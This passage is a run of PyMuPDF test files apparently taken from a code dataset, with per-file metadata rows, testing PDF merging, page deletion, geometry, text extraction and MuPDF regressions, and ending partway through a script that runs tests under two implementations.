    assert page._count_q_balance() == (0, 0)
    assert page.is_wrapped
    # an appended "pop" must be balanced by a prepended "push"
    pymupdf.TOOLS._insert_contents(page, b"Q", True)  # append
    assert page._count_q_balance() == (1, 0)
    # a prepended "pop" yet needs another push
    pymupdf.TOOLS._insert_contents(page, b"Q", False)  # prepend
    assert page._count_q_balance() == (2, 0)
    # an appended "push" needs an additional "pop"
    pymupdf.TOOLS._insert_contents(page, b"q", True)  # append
    assert page._count_q_balance() == (2, 1)
    # wrapping the contents should yield a balanced state again
    assert page.is_wrapped is False
    page.wrap_contents()
    assert page.is_wrapped is True
    assert page._count_q_balance() == (0, 0)
| 2,213 | Python | .py | 45 | 43.866667 | 81 | 0.68165 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,366 | test_insertpdf.py | pymupdf_PyMuPDF/tests/test_insertpdf.py | """
* Join multiple PDFs into a new one.
* Compare with stored earlier result:
- must have identical object definitions
- must have different trailers
* Try inserting files in a loop.
"""
import io
import os
import re
import pymupdf
# Directory of this test file and its shared resource folder.
scriptdir = os.path.abspath(os.path.dirname(__file__))
resources = os.path.join(scriptdir, "resources")
def approx_parse( text):
    '''
    Splits <text> into sequence of (text, number) pairs. Where sequence of
    [0-9.] is not convertible to a number (e.g. '4.5.6'), <number> will be
    None.

    NOTE(review): a run of digits at the very start of <text> is not matched
    by the pattern and is silently dropped — confirm callers never pass such
    strings.
    '''
    pairs = []
    for match in re.finditer('([^0-9]+)([0-9.]*)', text):
        prefix, digits = match.group(1), match.group(2)
        try:
            value = float(digits)
        except Exception:
            # Not a valid float (e.g. '' or '4.5.6'): keep it as text.
            prefix += digits
            value = None
        pairs.append((prefix, value))
    return pairs
def approx_compare( a, b, max_delta):
'''
Compares <a> and <b>, allowing numbers to differ by up to <delta>.
'''
aa = approx_parse( a)
bb = approx_parse( b)
if len(aa) != len(bb):
return 1
ret = 1
for (at, an), (bt, bn) in zip( aa, bb):
if at != bt:
break
if an is not None and bn is not None:
if abs( an - bn) >= max_delta:
print( f'diff={an-bn}: an={an} bn={bn}')
break
elif (an is None) != (bn is None):
break
else:
ret = 0
if ret:
print( f'Differ:\n a={a!r}\n b={b!r}')
return ret
def test_insert():
all_text_original = [] # text on input pages
all_text_combined = [] # text on resulting output pages
# prepare input PDFs
doc1 = pymupdf.open()
for i in range(5): # just arbitrary number of pages
text = f"doc 1, page {i}" # the 'globally' unique text
page = doc1.new_page()
page.insert_text((100, 72), text)
all_text_original.append(text)
doc2 = pymupdf.open()
for i in range(4):
text = f"doc 2, page {i}"
page = doc2.new_page()
page.insert_text((100, 72), text)
all_text_original.append(text)
doc3 = pymupdf.open()
for i in range(3):
text = f"doc 3, page {i}"
page = doc3.new_page()
page.insert_text((100, 72), text)
all_text_original.append(text)
doc4 = pymupdf.open()
for i in range(6):
text = f"doc 4, page {i}"
page = doc4.new_page()
page.insert_text((100, 72), text)
all_text_original.append(text)
new_doc = pymupdf.open() # make combined PDF of input files
new_doc.insert_pdf(doc1)
new_doc.insert_pdf(doc2)
new_doc.insert_pdf(doc3)
new_doc.insert_pdf(doc4)
# read text from all pages and store in list
for page in new_doc:
all_text_combined.append(page.get_text().replace("\n", ""))
# the lists must be equal
assert all_text_combined == all_text_original
def test_issue1417_insertpdf_in_loop():
"""Using a context manager instead of explicitly closing files"""
f = os.path.join(resources, "1.pdf")
big_doc = pymupdf.open()
fd1 = os.open( f, os.O_RDONLY)
os.close( fd1)
for n in range(0, 1025):
with pymupdf.open(f) as pdf:
big_doc.insert_pdf(pdf)
# Create a raw file descriptor. If the above pymupdf.open() context leaks
# a file descriptor, fd will be seen to increment.
fd2 = os.open( f, os.O_RDONLY)
assert fd2 == fd1
os.close( fd2)
big_doc.close()
def _test_insert_adobe():
path = os.path.abspath( f'{__file__}/../../../PyMuPDF-performance/adobe.pdf')
if not os.path.exists(path):
print(f'Not running test_insert_adobe() because does not exist: {os.path.relpath(path)}')
return
a = pymupdf.Document()
b = pymupdf.Document(path)
a.insert_pdf(b)
def _2861_2871_merge_pdf(content: bytes, coverpage: bytes):
with pymupdf.Document(stream=coverpage, filetype="pdf") as coverpage_pdf:
with pymupdf.Document(stream=content, filetype="pdf") as content_pdf:
coverpage_pdf.insert_pdf(content_pdf)
doc = coverpage_pdf.write()
return doc
def test_2861():
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2861.pdf')
with open(path, "rb") as content_pdf:
with open(path, "rb") as coverpage_pdf:
content = content_pdf.read()
coverpage = coverpage_pdf.read()
_2861_2871_merge_pdf(content, coverpage)
def test_2871():
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2871.pdf')
with open(path, "rb") as content_pdf:
with open(path, "rb") as coverpage_pdf:
content = content_pdf.read()
coverpage = coverpage_pdf.read()
_2861_2871_merge_pdf(content, coverpage)
def test_3789():
file_path = os.path.abspath(f'{__file__}/../../tests/resources/test_3789.pdf')
result_path = os.path.abspath(f'{__file__}/../../tests/test_3789_out')
pages_per_split = 5
# Clean pdf
doc = pymupdf.open(file_path)
tmp = io.BytesIO()
tmp.write(doc.write(garbage=4, deflate=True))
source_doc = pymupdf.Document('pdf', tmp.getvalue())
tmp.close()
# Calculate the number of pages per split file and the number of split files
page_range = pages_per_split - 1
split_range = range(0, source_doc.page_count, pages_per_split)
num_splits = len(split_range)
# Loop through each split range and create a new PDF file
for i, start in enumerate(split_range):
output_doc = pymupdf.open()
# Determine the ending page for this split file
to_page = start + page_range if i < num_splits - 1 else -1
output_doc.insert_pdf(source_doc, from_page=start, to_page=to_page)
# Save the output document to a file and add the path to the list of split files
path = f'{result_path}_{i}.pdf'
output_doc.save(path, garbage=2)
print(f'Have saved to {path=}.')
# If this is the last split file, exit the loop
if to_page == -1:
break
| 6,088 | Python | .py | 160 | 31.04375 | 97 | 0.607483 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,367 | test_flake8.py | pymupdf_PyMuPDF/tests/test_flake8.py | import pymupdf
import os
import subprocess
import sys
def test_flake8():
'''
Check rebased Python code with flake8.
'''
if not hasattr(pymupdf, 'mupdf'):
print(f'Not running flake8 with classic implementation.')
return
ignores = (
'E123', # closing bracket does not match indentation of opening bracket's line
'E124', # closing bracket does not match visual indentation
'E126', # continuation line over-indented for hanging indent
'E127', # continuation line over-indented for visual indent
'E128', # continuation line under-indented for visual indent
'E131', # continuation line unaligned for hanging indent
'E201', # whitespace after '('
'E203', # whitespace before ':'
'E221', # E221 multiple spaces before operator
'E225', # missing whitespace around operator
'E226', # missing whitespace around arithmetic operator
'E231', # missing whitespace after ','
'E241', # multiple spaces after ':'
'E251', # unexpected spaces around keyword / parameter equals
'E252', # missing whitespace around parameter equals
'E261', # at least two spaces before inline comment
'E265', # block comment should start with '# '
'E271', # multiple spaces after keyword
'E272', # multiple spaces before keyword
'E302', # expected 2 blank lines, found 1
'E305', # expected 2 blank lines after class or function definition, found 1
'E306', # expected 1 blank line before a nested definition, found 0
'E402', # module level import not at top of file
'E501', # line too long (80 > 79 characters)
'E701', # multiple statements on one line (colon)
'E741', # ambiguous variable name 'l'
'F541', # f-string is missing placeholders
'W293', # blank line contains whitespace
'W503', # line break before binary operator
'W504', # line break after binary operator
'E731', # do not assign a lambda expression, use a def
)
ignores = ','.join(ignores)
root = os.path.abspath(f'{__file__}/../..')
def run(command):
print(f'test_flake8(): Running: {command}')
subprocess.run(command, shell=1, check=1)
run(f'flake8 --ignore={ignores} --statistics {root}/src/__init__.py {root}/src/utils.py {root}/src/table.py')
print(f'test_flake8(): flake8 succeeded.')
| 2,575 | Python | .py | 51 | 40.490196 | 113 | 0.614439 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,368 | test_2548.py | pymupdf_PyMuPDF/tests/test_2548.py | import os
import pymupdf
root = os.path.abspath(f'{__file__}/../..')
def test_2548():
"""Text extraction should fail because of PDF structure cycle.
Old MuPDF version did not detect the loop.
"""
print(f'test_2548(): {pymupdf.mupdf_version_tuple=}')
if pymupdf.mupdf_version_tuple < (1, 23, 4):
print(f'test_2548(): Not testing #2548 because infinite hang before mupdf-1.23.4.')
return
pymupdf.TOOLS.mupdf_warnings(reset=True)
doc = pymupdf.open(f'{root}/tests/resources/test_2548.pdf')
e = False
for page in doc:
try:
_ = page.get_text()
except Exception as ee:
print(f'test_2548: {ee=}')
if hasattr(pymupdf, 'mupdf'):
# Rebased.
expected = "RuntimeError('code=2: cycle in structure tree')"
else:
# Classic.
expected = "RuntimeError('cycle in structure tree')"
assert repr(ee) == expected, f'Expected {expected=} but got {repr(ee)=}.'
e = True
wt = pymupdf.TOOLS.mupdf_warnings()
print(f'test_2548(): {wt=}')
# This checks that PyMuPDF 1.23.7 fixes this bug, and also that earlier
# versions with updated MuPDF also fix the bug.
rebased = hasattr(pymupdf, 'mupdf')
if pymupdf.mupdf_version_tuple >= (1, 23, 7):
if pymupdf.mupdf_version_tuple >= (1, 25):
expected = 'format error: cycle in structure tree\nstructure tree broken, assume tree is missing'
elif pymupdf.mupdf_version_tuple >= (1, 24):
expected = 'Loop found in structure tree. Ignoring structure.'
else:
expected = 'structure tree broken, assume tree is missing: cycle in structure tree'
if rebased:
assert wt == expected, f'expected:\n {expected!r}\nwt:\n {wt!r}\n'
assert not e
else:
assert e
if rebased:
assert not wt
| 1,947 | Python | .py | 46 | 33.565217 | 109 | 0.600211 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,369 | test_nonpdf.py | pymupdf_PyMuPDF/tests/test_nonpdf.py | """
* Check EPUB document is no PDF
* Check page access using (chapter, page) notation
* Re-layout EPUB ensuring a previous location is memorized
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "Bezier.epub")
doc = pymupdf.open(filename)
def test_isnopdf():
assert not doc.is_pdf
def test_pageids():
assert doc.chapter_count == 7
assert doc.last_location == (6, 1)
assert doc.prev_location((6, 0)) == (5, 11)
assert doc.next_location((5, 11)) == (6, 0)
# Check page numbers have no gaps:
i = 0
for chapter in range(doc.chapter_count):
for cpno in range(doc.chapter_page_count(chapter)):
assert doc.page_number_from_location((chapter, cpno)) == i
i += 1
def test_layout():
"""Memorize a page location, re-layout with ISO-A4, assert pre-determined location."""
loc = doc.make_bookmark((5, 11))
doc.layout(pymupdf.Rect(pymupdf.paper_rect("a4")))
assert doc.find_bookmark(loc) == (5, 6)
| 1,054 | Python | .py | 28 | 33.535714 | 90 | 0.676153 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,370 | test_pagedelete.py | pymupdf_PyMuPDF/tests/test_pagedelete.py | """
----------------------------------------------------
This tests correct functioning of multi-page delete
----------------------------------------------------
Create a PDF in memory with 100 pages with a unique text each.
Also create a TOC with a bookmark per page.
On every page after the first to-be-deleted page, also insert a link, which
points to this page.
The bookmark text equals the text on the page for easy verification.
Then delete some pages and verify:
- the new TOC has empty items exactly for every deleted page
- the remaining TOC items still point to the correct page
- the document has no more links at all
"""
import os
import pymupdf
scriptdir = os.path.dirname(__file__)
page_count = 100 # initial document length
r = range(5, 35, 5) # contains page numbers we will delete
# insert this link on pages after first deleted one
link = {
"from": pymupdf.Rect(100, 100, 120, 120),
"kind": pymupdf.LINK_GOTO,
"page": r[0],
"to": pymupdf.Point(100, 100),
}
def test_deletion():
# First prepare the document.
doc = pymupdf.open()
toc = []
for i in range(page_count):
page = doc.new_page() # make a page
page.insert_text((100, 100), "%i" % i) # insert unique text
if i > r[0]: # insert a link
page.insert_link(link)
toc.append([1, "%i" % i, i + 1]) # TOC bookmark to this page
doc.set_toc(toc) # insert the TOC
assert doc.has_links() # check we did insert links
# Test page deletion.
# Delete pages in range and verify result
del doc[r]
assert not doc.has_links() # verify all links have gone
assert doc.page_count == page_count - len(r) # correct number deleted?
toc_new = doc.get_toc() # this is the modified TOC
# verify number of emptied items (have page number -1)
assert len([item for item in toc_new if item[-1] == -1]) == len(r)
# Deleted page numbers must correspond to TOC items with page number -1.
for i in r:
assert toc_new[i][-1] == -1
# Remaining pages must be correctly pointed to by the non-empty TOC items
for item in toc_new:
pno = item[-1]
if pno == -1: # one of the emptied items
continue
pno -= 1 # PDF page number
text = doc[pno].get_text().replace("\n", "")
# toc text must equal text on page
assert text == item[1]
doc.delete_page(0) # just for the coverage stats
del doc[5:10]
doc.select(range(doc.page_count))
doc.copy_page(0)
doc.move_page(0)
doc.fullcopy_page(0)
def test_3094():
path = os.path.abspath(f"{__file__}/../../tests/resources/test_2871.pdf")
document = pymupdf.open(path)
pnos = [i for i in range(0, document.page_count, 2)]
document.delete_pages(pnos)
def test_3150():
"""Assert correct functioning for problem file.
Implicitly also check use of new MuPDF function
pdf_rearrange_pages() since version 1.23.9.
"""
filename = os.path.join(scriptdir, "resources", "test-3150.pdf")
pages = [3, 3, 3, 2, 3, 1, 0, 0]
doc = pymupdf.open(filename)
doc.select(pages)
assert doc.page_count == len(pages)
| 3,156 | Python | .py | 79 | 35.278481 | 77 | 0.63761 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,371 | test_geometry.py | pymupdf_PyMuPDF/tests/test_geometry.py | """
* Check various construction methods of rects, points, matrices
* Check matrix inversions in variations
* Check algebra constructs
"""
import os
import pymupdf
def test_rect():
assert tuple(pymupdf.Rect()) == (0, 0, 0, 0)
if hasattr(pymupdf, 'mupdf'):
assert tuple(pymupdf.Rect(y0=12)) == (0, 12, 0, 0)
assert tuple(pymupdf.Rect(10, 20, 100, 200, x1=12)) == (10, 20, 12, 200)
p1 = pymupdf.Point(10, 20)
p2 = pymupdf.Point(100, 200)
p3 = pymupdf.Point(150, 250)
r = pymupdf.Rect(10, 20, 100, 200)
r_tuple = tuple(r)
assert tuple(pymupdf.Rect(p1, p2)) == r_tuple
assert tuple(pymupdf.Rect(p1, 100, 200)) == r_tuple
assert tuple(pymupdf.Rect(10, 20, p2)) == r_tuple
assert tuple(r.include_point(p3)) == (10, 20, 150, 250)
r = pymupdf.Rect(10, 20, 100, 200)
assert tuple(r.include_rect((100, 200, 110, 220))) == (10, 20, 110, 220)
r = pymupdf.Rect(10, 20, 100, 200)
# include empty rect makes no change
assert tuple(r.include_rect((0, 0, 0, 0))) == r_tuple
# include invalid rect makes no change
assert tuple(r.include_rect((1, 1, -1, -1))) == r_tuple
r = pymupdf.Rect()
for i in range(4):
r[i] = i + 1
assert r == pymupdf.Rect(1, 2, 3, 4)
assert pymupdf.Rect() / 5 == pymupdf.Rect()
assert pymupdf.Rect(1, 1, 2, 2) / pymupdf.Identity == pymupdf.Rect(1, 1, 2, 2)
failed = False
try:
r = pymupdf.Rect(1)
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.Rect(1, 2, 3, 4, 5)
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.Rect((1, 2, 3, 4, 5))
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.Rect(1, 2, 3, "x")
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.Rect()
r[5] = 1
except:
failed = True
assert failed
def test_irect():
p1 = pymupdf.Point(10, 20)
p2 = pymupdf.Point(100, 200)
p3 = pymupdf.Point(150, 250)
r = pymupdf.IRect(10, 20, 100, 200)
r_tuple = tuple(r)
assert tuple(pymupdf.IRect(p1, p2)) == r_tuple
assert tuple(pymupdf.IRect(p1, 100, 200)) == r_tuple
assert tuple(pymupdf.IRect(10, 20, p2)) == r_tuple
assert tuple(r.include_point(p3)) == (10, 20, 150, 250)
r = pymupdf.IRect(10, 20, 100, 200)
assert tuple(r.include_rect((100, 200, 110, 220))) == (10, 20, 110, 220)
r = pymupdf.IRect(10, 20, 100, 200)
# include empty rect makes no change
assert tuple(r.include_rect((0, 0, 0, 0))) == r_tuple
r = pymupdf.IRect()
for i in range(4):
r[i] = i + 1
assert r == pymupdf.IRect(1, 2, 3, 4)
failed = False
try:
r = pymupdf.IRect(1)
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.IRect(1, 2, 3, 4, 5)
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.IRect((1, 2, 3, 4, 5))
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.IRect(1, 2, 3, "x")
except:
failed = True
assert failed
failed = False
try:
r = pymupdf.IRect()
r[5] = 1
except:
failed = True
assert failed
def test_inversion():
alpha = 255
m1 = pymupdf.Matrix(alpha)
m2 = pymupdf.Matrix(-alpha)
m3 = m1 * m2 # should equal identity matrix
assert abs(m3 - pymupdf.Identity) < pymupdf.EPSILON
m = pymupdf.Matrix(1, 0, 1, 0, 1, 0) # not invertible!
# inverted matrix must be zero
assert ~m == pymupdf.Matrix()
def test_matrix():
assert tuple(pymupdf.Matrix()) == (0, 0, 0, 0, 0, 0)
assert tuple(pymupdf.Matrix(90)) == (0, 1, -1, 0, 0, 0)
if hasattr(pymupdf, 'mupdf'):
assert tuple(pymupdf.Matrix(c=1)) == (0, 0, 1, 0, 0, 0)
assert tuple(pymupdf.Matrix(90, e=5)) == (0, 1, -1, 0, 5, 0)
m45p = pymupdf.Matrix(45)
m45m = pymupdf.Matrix(-45)
m90 = pymupdf.Matrix(90)
assert abs(m90 - m45p * m45p) < pymupdf.EPSILON
assert abs(pymupdf.Identity - m45p * m45m) < pymupdf.EPSILON
assert abs(m45p - ~m45m) < pymupdf.EPSILON
assert pymupdf.Matrix(2, 3, 1) == pymupdf.Matrix(1, 3, 2, 1, 0, 0)
m = pymupdf.Matrix(2, 3, 1)
m.invert()
assert abs(m * pymupdf.Matrix(2, 3, 1) - pymupdf.Identity) < pymupdf.EPSILON
assert pymupdf.Matrix(1, 1).pretranslate(2, 3) == pymupdf.Matrix(1, 0, 0, 1, 2, 3)
assert pymupdf.Matrix(1, 1).prescale(2, 3) == pymupdf.Matrix(2, 0, 0, 3, 0, 0)
assert pymupdf.Matrix(1, 1).preshear(2, 3) == pymupdf.Matrix(1, 3, 2, 1, 0, 0)
assert abs(pymupdf.Matrix(1, 1).prerotate(30) - pymupdf.Matrix(30)) < pymupdf.EPSILON
small = 1e-6
assert pymupdf.Matrix(1, 1).prerotate(90 + small) == pymupdf.Matrix(90)
assert pymupdf.Matrix(1, 1).prerotate(180 + small) == pymupdf.Matrix(180)
assert pymupdf.Matrix(1, 1).prerotate(270 + small) == pymupdf.Matrix(270)
assert pymupdf.Matrix(1, 1).prerotate(small) == pymupdf.Matrix(0)
assert pymupdf.Matrix(1, 1).concat(
pymupdf.Matrix(1, 2), pymupdf.Matrix(3, 4)
) == pymupdf.Matrix(3, 0, 0, 8, 0, 0)
assert pymupdf.Matrix(1, 2, 3, 4, 5, 6) / 1 == pymupdf.Matrix(1, 2, 3, 4, 5, 6)
assert m[0] == m.a
assert m[1] == m.b
assert m[2] == m.c
assert m[3] == m.d
assert m[4] == m.e
assert m[5] == m.f
m = pymupdf.Matrix()
for i in range(6):
m[i] = i + 1
assert m == pymupdf.Matrix(1, 2, 3, 4, 5, 6)
failed = False
try:
m = pymupdf.Matrix(1, 2, 3)
except:
failed = True
assert failed
failed = False
try:
m = pymupdf.Matrix(1, 2, 3, 4, 5, 6, 7)
except:
failed = True
assert failed
failed = False
try:
m = pymupdf.Matrix((1, 2, 3, 4, 5, 6, 7))
except:
failed = True
assert failed
failed = False
try:
m = pymupdf.Matrix(1, 2, 3, 4, 5, "x")
except:
failed = True
assert failed
failed = False
try:
m = pymupdf.Matrix(1, 0, 1, 0, 1, 0)
n = pymupdf.Matrix(1, 1) / m
except:
failed = True
assert failed
def test_point():
assert tuple(pymupdf.Point()) == (0, 0)
assert pymupdf.Point(1, -1).unit == pymupdf.Point(5, -5).unit
assert pymupdf.Point(-1, -1).abs_unit == pymupdf.Point(1, 1).unit
assert pymupdf.Point(1, 1).distance_to(pymupdf.Point(1, 1)) == 0
assert pymupdf.Point(1, 1).distance_to(pymupdf.Rect(1, 1, 2, 2)) == 0
assert pymupdf.Point().distance_to((1, 1, 2, 2)) > 0
failed = False
try:
p = pymupdf.Point(1, 2, 3)
except:
failed = True
assert failed
failed = False
try:
p = pymupdf.Point((1, 2, 3))
except:
failed = True
assert failed
failed = False
try:
p = pymupdf.Point(1, "x")
except:
failed = True
assert failed
failed = False
try:
p = pymupdf.Point()
p[3] = 1
except:
failed = True
assert failed
def test_algebra():
p = pymupdf.Point(1, 2)
m = pymupdf.Matrix(1, 2, 3, 4, 5, 6)
r = pymupdf.Rect(1, 1, 2, 2)
assert p + p == p * 2
assert p - p == pymupdf.Point()
assert m + m == m * 2
assert m - m == pymupdf.Matrix()
assert r + r == r * 2
assert r - r == pymupdf.Rect()
assert p + 5 == pymupdf.Point(6, 7)
assert m + 5 == pymupdf.Matrix(6, 7, 8, 9, 10, 11)
assert r.tl in r
assert r.tr not in r
assert r.br not in r
assert r.bl not in r
assert p * m == pymupdf.Point(12, 16)
assert r * m == pymupdf.Rect(9, 12, 13, 18)
assert (pymupdf.Rect(1, 1, 2, 2) & pymupdf.Rect(2, 2, 3, 3)).is_empty
assert not pymupdf.Rect(1, 1, 2, 2).intersects((2, 2, 4, 4))
failed = False
try:
x = m + p
except:
failed = True
assert failed
failed = False
try:
x = m + r
except:
failed = True
assert failed
failed = False
try:
x = p + r
except:
failed = True
assert failed
failed = False
try:
x = r + m
except:
failed = True
assert failed
assert m not in r
def test_quad():
r = pymupdf.Rect(10, 10, 20, 20)
q = r.quad
assert q.is_rectangular
assert not q.is_empty
assert q.is_convex
q *= pymupdf.Matrix(1, 1).preshear(2, 3)
assert not q.is_rectangular
assert not q.is_empty
assert q.is_convex
assert r.tl not in q
assert r not in q
assert r.quad not in q
failed = False
try:
q[5] = pymupdf.Point()
except:
failed = True
assert failed
failed = False
try:
q /= (1, 0, 1, 0, 1, 0)
except:
failed = True
assert failed
def test_pageboxes():
"""Tests concerning ArtBox, TrimBox, BleedBox."""
doc = pymupdf.open()
page = doc.new_page()
assert page.cropbox == page.artbox == page.bleedbox == page.trimbox
rect_methods = (
page.set_cropbox,
page.set_artbox,
page.set_bleedbox,
page.set_trimbox,
)
keys = ("CropBox", "ArtBox", "BleedBox", "TrimBox")
rect = pymupdf.Rect(100, 200, 400, 700)
for f in rect_methods:
f(rect)
for key in keys:
assert doc.xref_get_key(page.xref, key) == ("array", "[100 142 400 642]")
assert page.cropbox == page.artbox == page.bleedbox == page.trimbox
def test_3163():
b = {'number': 0, 'type': 0, 'bbox': (403.3577880859375, 330.8871765136719, 541.2731323242188, 349.5766296386719), 'lines': [{'spans': [{'size': 14.0, 'flags': 4, 'font': 'SFHello-Medium', 'color': 1907995, 'ascender': 1.07373046875, 'descender': -0.26123046875, 'text': 'Inclusion and diversity', 'origin': (403.3577880859375, 345.9194030761719), 'bbox': (403.3577880859375, 330.8871765136719, 541.2731323242188, 349.5766296386719)}], 'wmode': 0, 'dir': (1.0, 0.0), 'bbox': (403.3577880859375, 330.8871765136719, 541.2731323242188, 349.5766296386719)}]}
bbox = pymupdf.IRect(b["bbox"])
def test_3182():
pix = pymupdf.Pixmap(os.path.abspath(f'{__file__}/../../tests/resources/img-transparent.png'))
rect = pymupdf.Rect(0, 0, 100, 100)
pix.invert_irect(rect)
| 10,276 | Python | .py | 321 | 26.292835 | 558 | 0.587832 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,372 | test_page_links.py | pymupdf_PyMuPDF/tests/test_page_links.py | import pymupdf
import os
def test_page_links_generator():
# open some arbitrary PDF
path = os.path.abspath(f"{__file__}/../../tests/resources/2.pdf")
doc = pymupdf.open(path)
# select an arbitrary page
page = doc[-1]
# iterate over pages.links
link_generator = page.links()
links = list(link_generator)
assert len(links) == 7
| 367 | Python | .py | 12 | 26.166667 | 69 | 0.665714 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,373 | test_mupdf_regressions.py | pymupdf_PyMuPDF/tests/test_mupdf_regressions.py | import pymupdf
import os
from gentle_compare import gentle_compare
scriptdir = os.path.abspath(os.path.dirname(__file__))
def test_707448():
"""Confirm page content cleaning does not destroy page appearance."""
filename = os.path.join(scriptdir, "resources", "test-707448.pdf")
doc = pymupdf.open(filename)
page = doc[0]
words0 = page.get_text("words")
page.clean_contents(sanitize=True)
words1 = page.get_text("words")
assert gentle_compare(words0, words1)
def test_707673():
"""Confirm page content cleaning does not destroy page appearance.
Fails starting with MuPDF v1.23.9.
Fixed in:
commit 779b8234529cb82aa1e92826854c7bb98b19e44b (golden/master)
"""
filename = os.path.join(scriptdir, "resources", "test-707673.pdf")
doc = pymupdf.open(filename)
page = doc[0]
words0 = page.get_text("words")
page.clean_contents(sanitize=True)
words1 = page.get_text("words")
ok = gentle_compare(words0, words1)
if pymupdf.mupdf_version_tuple >= (1, 24, 1):
assert ok
else:
assert not ok
def test_707727():
"""Confirm page content cleaning does not destroy page appearance.
MuPDF issue: https://bugs.ghostscript.com/show_bug.cgi?id=707727
"""
filename = os.path.join(scriptdir, "resources", "test_3362.pdf")
doc = pymupdf.open(filename)
page = doc[0]
pix0 = page.get_pixmap()
page.clean_contents(sanitize=True)
page = doc.reload_page(page) # required to prevent re-use
pix1 = page.get_pixmap()
ok = pix0.samples == pix1.samples
if pymupdf.mupdf_version_tuple > (1, 24, 1):
assert ok
else:
assert not ok
if pymupdf.mupdf_version_tuple <= (1, 24, 1):
# We expect warnings.
wt = pymupdf.TOOLS.mupdf_warnings()
print(f"{wt=}")
assert wt
def test_707721():
"""Confirm text extraction works for nested MCID with Type 3 fonts.
PyMuPDF issue https://github.com/pymupdf/PyMuPDF/issues/3357
MuPDF issue: https://bugs.ghostscript.com/show_bug.cgi?id=707721
"""
if pymupdf.mupdf_version_tuple < (1, 24, 2):
print(
"test_707721(): not running because MuPDF-{pymupdf.mupdf_version} known to hang."
)
return
filename = os.path.join(scriptdir, "resources", "test_3357.pdf")
doc = pymupdf.open(filename)
page = doc[0]
ok = page.get_text()
assert ok
def test_3376():
"""Check fix of MuPDF bug 707733.
https://bugs.ghostscript.com/show_bug.cgi?id=707733
PyMuPDF issue https://github.com/pymupdf/PyMuPDF/issues/3376
Test file contains a redaction for the first 3 words: "Table of Contents".
Test strategy:
- extract all words (sorted)
- apply redactions
- extract words again
- confirm: we now have 3 words less and remaining words are equal.
"""
filename = os.path.join(scriptdir, "resources", "test_3376.pdf")
doc = pymupdf.open(filename)
page = doc[0]
words0 = page.get_text("words", sort=True)
words0_s = words0[:3] # first 3 words
words0_e = words0[3:] # remaining words
assert " ".join([w[4] for w in words0_s]) == "Table of Contents"
page.apply_redactions()
words1 = page.get_text("words", sort=True)
ok = gentle_compare(words0_e, words1)
if pymupdf.mupdf_version_tuple >= (1, 24, 2):
assert ok
else:
assert not ok
| 3,402 | Python | .py | 91 | 31.912088 | 93 | 0.668894 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,374 | run_compound.py | pymupdf_PyMuPDF/tests/run_compound.py | #! /usr/bin/env python3
'''
Runs a command using different implementations of PyMuPDF:
1. Run with rebased implementation of PyMuPDF.
2. As 1 but also set PYMUPDF_USE_EXTRA=0 to disable use of C++ optimisations.
Example usage:
./PyMuPDF/tests/run_compound.py python -m pytest -s PyMuPDF
Use `-i <implementations>` to select which implementations to use. In
`<implementations>`, `r` means rebased, `R` means rebased without
optimisations.
For example use the rebased and unoptimised rebased implementations with:
./PyMuPDF/tests/run_compound.py python -m pytest -s PyMuPDF
'''
import shlex
import os
import platform
import subprocess
import sys
import textwrap
import time
def log(text):
print(textwrap.indent(text, 'PyMuPDF:tests/run_compound.py: '))
sys.stdout.flush()
def log_star(text):
log('#' * 40)
log(text)
log('#' * 40)
def main():
implementations = 'rR'
timeout = None
i = 1
while i < len(sys.argv):
arg = sys.argv[i]
if arg == '-i':
i += 1
implementations = sys.argv[i]
elif arg == '-t':
i += 1
timeout = float(sys.argv[i])
elif arg.startswith('-'):
raise Exception(f'Unrecognised {arg=}.')
else:
break
i += 1
args = sys.argv[i:]
e_rebased = None
e_rebased_unoptimised = None
endtime = None
if timeout:
endtime = time.time() + timeout
# Check `implementations`.
implementations_seen = set()
for i in implementations:
assert i not in implementations_seen, f'Duplicate implementation {i!r} in {implementations!r}.'
if i == 'r':
name = 'rebased'
elif i == 'R':
name = 'rebased (unoptimised)'
else:
assert 0, f'Unrecognised implementation {i!r} in {implementations!r}.'
log(f' {i!r}: will run with PyMuPDF {name}.')
implementations_seen.add(i)
for i in implementations:
log(f'run_compound.py: {i=}')
timeout = None
if endtime:
timeout = max(0, endtime - time.time())
if i == 'r':
# Run with default `pymupdf` (rebased).
#
log_star( f'Running using pymupdf (rebased): {shlex.join(args)}')
e_rebased = subprocess.run( args, shell=0, check=0, timeout=timeout).returncode
elif i == 'R':
# Run with `pymupdf` (rebased) again, this time with PYMUPDF_USE_EXTRA=0.
#
env = os.environ.copy()
env[ 'PYMUPDF_USE_EXTRA'] = '0'
log_star(f'Running using pymupdf (rebased) with PYMUPDF_USE_EXTRA=0: {shlex.join(args)}')
e_rebased_unoptimised = subprocess.run( args, shell=0, check=0, env=env, timeout=timeout).returncode
else:
raise Exception(f'Unrecognised implementation {i!r}.')
